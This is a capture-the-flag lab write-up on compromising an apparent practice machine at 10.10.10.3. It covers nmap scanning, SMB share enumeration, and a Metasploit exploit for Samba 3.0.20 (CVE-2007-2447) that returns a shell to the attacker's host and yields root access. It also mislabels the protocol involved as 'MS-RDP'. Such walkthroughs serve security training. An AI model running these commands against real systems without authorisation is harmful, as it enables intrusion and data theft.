Introduction
In this lab, we will perform reconnaissance and exploitation on a target system with the IP address 10.10.10.3. Our goal is to gain unauthorized access to the system and retrieve both the user and root flags. We will employ various tools and techniques to achieve this objective.
Fingerprinting
To begin, we need to gather information about the target system. We start by determining the operating system using the TTL value obtained from a ping to the server:
ping 10.10.10.3
The TTL value of 63 suggests that the target system is likely running Linux.
Next, we conduct a basic nmap scan to identify open ports and services:
nmap 10.10.10.3
Unfortunately, the scan reports that the host appears to be down. To overcome this issue, we instruct nmap to treat the target system as online:
nmap -Pn 10.10.10.3
This time, we receive some results. To gather more detailed information about the detected versions and services, we run additional probes and save the results for reference:
nmap -sV -Pn 10.10.10.3 -oN nmap.txt
The scan reveals several open ports with corresponding services and versions:
| PORT | STATE | SERVICE | VERSION |
|---|---|---|---|
| 21/tcp | open | ftp | vsftpd 2.3.4 |
| 22/tcp | open | ssh | OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) |
| 139/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
| 445/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
FTP
Let’s begin by attempting to log in anonymously to the FTP service:
ftp anonymous@10.10.10.3
Although the login is successful, we cannot see any files in the FTP directory. To gather more information, we search for the version of the FTP service in searchsploit:
searchsploit vsftpd
The search reveals two entries of interest: a Backdoor Command Execution exploit and its corresponding Metasploit module. To further investigate, we inspect the exploit:
searchsploit vsftpd -x 49757
At the top of the output, we find the CVE number CVE-2011-2523. Performing an internet search leads us to a relevant GitHub repository (GitHub), which explains that logging in with the username ‘:)’ opens a command shell on port 6200. However, when we attempt this method, it does not work. Alternatively, we can try using Metasploit:
msfconsole
search vsftpd
use 0
info
set RHOST 10.10.10.3
run
Although Metasploit reports a successful execution, it does not create a shell. Referring back to the GitHub repository, we discover that this exploit only works on specific compromised versions. Therefore, we can conclude that the version on our target system is not vulnerable, and we should explore other avenues.
Samba
We decide to shift our focus to the exploitation of the Samba service on the target system. To assist us in this endeavor, we refer to the Samba Resources for guidance.
To begin, we use SMBmap to perform an anonymous session scan on the Samba shares:
smbmap -H 10.10.10.3
The scan reveals the following shares with their corresponding permissions and comments:
| Disk | Permissions | Comment |
|---|---|---|
| print$ | NO ACCESS | Printer Drivers |
| tmp | READ, WRITE | oh noes! |
| opt | NO ACCESS | |
| IPC$ | NO ACCESS | IPC Service (lame server (Samba 3.0.20-Debian)) |
| ADMIN$ | NO ACCESS | IPC Service (lame server (Samba 3.0.20-Debian)) |
We observe that our null session has access to the “tmp” share. To further investigate, we utilize SMBClient to connect to the share without a password:
smbclient //10.10.10.3/tmp --no-pass
By navigating through the share using the “ls” and “cd” commands, we identify a file of potential interest: “vgauthsvclog.txt.0”. Let’s retrieve a local copy for inspection:
get vgauthsvclog.txt.0
Upon inspecting the file, we find a reference to another file that we don’t currently have access to: “/etc/vmware-tools/vgauth.conf”. This file may contain valuable information.
Since we still need to determine the version of Samba running on the target system, we resort to default scripts to gather this information:
nmap 10.10.10.3 -sC -Pn -p 445
The scan outputs the Samba version as “Samba 3.0.20-Debian”. Armed with this knowledge, we utilise searchsploit to explore potential exploits:
searchsploit samba 3.0.20
The search results reveal several options, among which the most promising exploit appears to be a username map script leading to command execution. Further inspection of the exploit discloses that it corresponds to CVE-2007-2447. Additional research (Research) informs us that this vulnerability leverages MS-RDP to pass unfiltered input to “/bin/sh”. To attempt exploitation, we turn to Metasploit:
msfconsole
search samba 3.0.20
use 0
info
set RHOST 10.10.10.3
set LHOST 10.10.14.4
run
Success! We have obtained a shell on the target system.
Enumeration
Now that we have a foothold on the target system, our next step is to stabilise the shell. We notice that Python 2 is available:
python `-c` `"import pty;pty.spawn('/bin/bash')"`
With a more interactive shell, we proceed to gather additional information:
whoami # root
Remarkably, we discover that we already have root-level access on the system.
User Flag
Let’s retrieve the user flag from the “/home/makis/user.txt” file:
cat /home/makis/user.txt
Root Flag
Next, we retrieve the root flag from the “/root/root.txt” file:
cat /root/root.txt
Conclusion
In this lab writeup, we successfully performed reconnaissance and exploitation on a target system. Through fingerprinting, we identified the operating system and discovered open ports and services. We attempted FTP and Samba exploits, leveraging vulnerabilities to gain unauthorized access. Our enumeration efforts led us to the user and root flags, confirming our successful penetration of the target system.
It is essential to approach such activities with caution and only conduct them within legal and authorized environments. This lab serves as a valuable exercise for understanding the significance of proper reconnaissance, vulnerability identification, and exploitation in the field of cybersecurity.